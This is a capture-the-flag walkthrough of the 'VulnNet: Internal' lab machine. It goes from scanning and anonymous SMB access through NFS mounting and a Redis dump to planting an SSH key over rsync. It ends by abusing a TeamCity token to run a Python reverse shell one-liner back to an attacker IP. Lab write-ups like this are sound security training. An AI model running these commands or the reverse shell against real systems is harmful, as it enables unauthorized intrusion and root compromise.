VulnNet Entertainment is a company that learns from its mistakes. They quickly realized that they can’t make a properly secured web application so they gave up on that idea. Instead, they decided to set up internal services for business purposes. As usual, you’re tasked to perform a penetration test of their network and report your findings.
Difficulty: Easy/Medium
Operating System: Linux
This machine was designed to be quite the opposite of the previous machines in this series and it focuses on internal services. It’s supposed to show you how you can retrieve interesting information and use it to gain system access. Report your findings by submitting the correct flags.
We always start with an nmap scan…..
Nmap -sC -sV -oA nmap <Target-IP>
# Nmap 7.91 scan initiated Mon May 10 03:22:51 2021 as: nmap -sC -sV -oA nmap 10.10.174.95
Nmap scan report for 10.10.174.95
Host is up (0.59s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA)
| 256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA)
|_ 256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 33966/udp6 mountd
| 100005 1,2,3 48735/tcp6 mountd
| 100005 1,2,3 57104/udp mountd
| 100005 1,2,3 60145/tcp mountd
| 100021 1,3,4 34733/tcp nlockmgr
| 100021 1,3,4 37755/tcp6 nlockmgr
| 100021 1,3,4 41102/udp6 nlockmgr
| 100021 1,3,4 46449/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
873/tcp open rsync (protocol version 31)
2049/tcp open nfs_acl 3 (RPC #100227)
8021/tcp filtered ftp-proxy
9090/tcp filtered zeus-admin
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h20m08s, deviation: 1h09m15s, median: 3h00m07s
|_nbstat: NetBIOS name: VULNNET-INTERNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: vulnnet-internal
| NetBIOS computer name: VULNNET-INTERNAL\x00
| Domain name: \x00
| FQDN: vulnnet-internal
|_ System time: 2021-05-10T12:39:18+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-10T10:39:17
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 10 03:39:32 2021 -- 1 IP address (1 host up) scanned in 1000.27 seconds
So we have ports open probably like 6 if am right ok let begin since we have smb open also let try it first checking for smb shares we have anonymous access to them.
smbclient -L //10.10.174.95/ -N
We have one share we can easily access it with the commands below;
smbclient //10.10.174.95/shares -N
And we are in.
Checking the temp folder we found the first flag services.txt and moving to the data folder some txt file but not that useful to me just some random messages.
Now going back to the scanning checking through the port i can see we have port 2049 NFS open, NFS port 2049 It is a client/server system that allows users to access files across a network and treat them as if they resided in a local file directory.
How to Mount it:
- showmount -e 10.10.174.95
- mkdir /tmp/NFS
- mount -t nfs 10.10.174.95:/opt/conf /tmp/NFS
- df -k
Now we can easily access the mount folder now.
Now since we have redis port open am checking the folder maybe we can get a credentials for it to log into redis, so we have some conf file of redis let check it.
And we have a password time to enumerate redis port 6379 .
Typing info give use the active databases on redis time to dump it.
redis-dump -u 10.10.174.95 -a Password > db_full.json
So we have the internal flag with some base64 strings let decode it.
And we have the decoded strings with some new password.
rsync Ok let explain what is rsync? rsync is a utility for efficiently transferring and synchronizing files between a computer and an external hard drive and across networked computers by comparing the modification times and sizes of files. It is commonly found on Unix-like operating systems. Rsync is written in C as a single threaded application. thanks Wikipedia .
Rsync Useage .
rsync runs on port 873
rsync -a rsync://rsync-connect@10.10.174.95/
Boom we can see a files in the home directory now let try to get it onto our system.
rsync -a rsync://rsync-connect@10.10.174.95/files ./rsync
So we have to give it time for it to transfer.
And it ready let change directory.
And we have user.txt also a cool ssh folder hahahahahaha but checking the ssh folder it was empty so sad .
Going around so since we can use use rsync to transfer files out i guess we can also use it to transfer file in probably ssh authorized_keys . So i generate a SSH keys with ` ssh-keygen -t rsa`
So i rename the id_rsa.pub to authorized_keys now time to get it onto the target.
rsync -av authorized_keys rsync://rsync-connect@10.10.174.95:/files/sys-internal/.ssh
Boom and we have it transfer, time to SSH into the machine with the private key we have.
- we have to give the private key a permission
chmod 600 id_rsa - we have the username which is
sys-internal - Let hit SSH
ssh -i id_rsa sys-internal@10.10.174.95
And we are in awesome but the journey is not yet completed.
Privilege Escalation
I always check what ports is running if i get access to a machine but netstat was missing on the target so i try using ss -tulpn | grep LISTEN .
Hmmm port 8111 look interesting now let set up SSH Tunneling (Port Forwarding) .
ssh -i id_rsa -L 8111:localhost:8111 sys-internal@10.10.174.95
Now let visit localhost:8111 to confirm it.
Now we need a token to get access to the super user panel so let go back to the machine to enumerate the TeamCity folder spend some time on it and boom i found the token file.
So i found the token at /TeamCity/logs/catalina.out let use it to log in without username .
And we are in time to get a reverse shell. Now let click on create New project.
And fill in the form with anything and click on create.
Now let click on the homepage and click the project we just created.
Click on it to create new build configuration.
Click and create and we should get a new page like that below;
Let go back to the homepage again to click on the project again.
Now let click on Edit Configuration Settings .
Now click on Build steps .
Now add build step .
Let go through it and pick python.
On command we pick custom script now time to add the python reverse shell script to the box with the name scripts.
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
Now add our Local-IP address and port also start an ncat listener to get our shell.
Now let click on save.
Now Click On Run we should have our shell.
And boom we have shell back.
Box Rooted .
Greeting From Muzec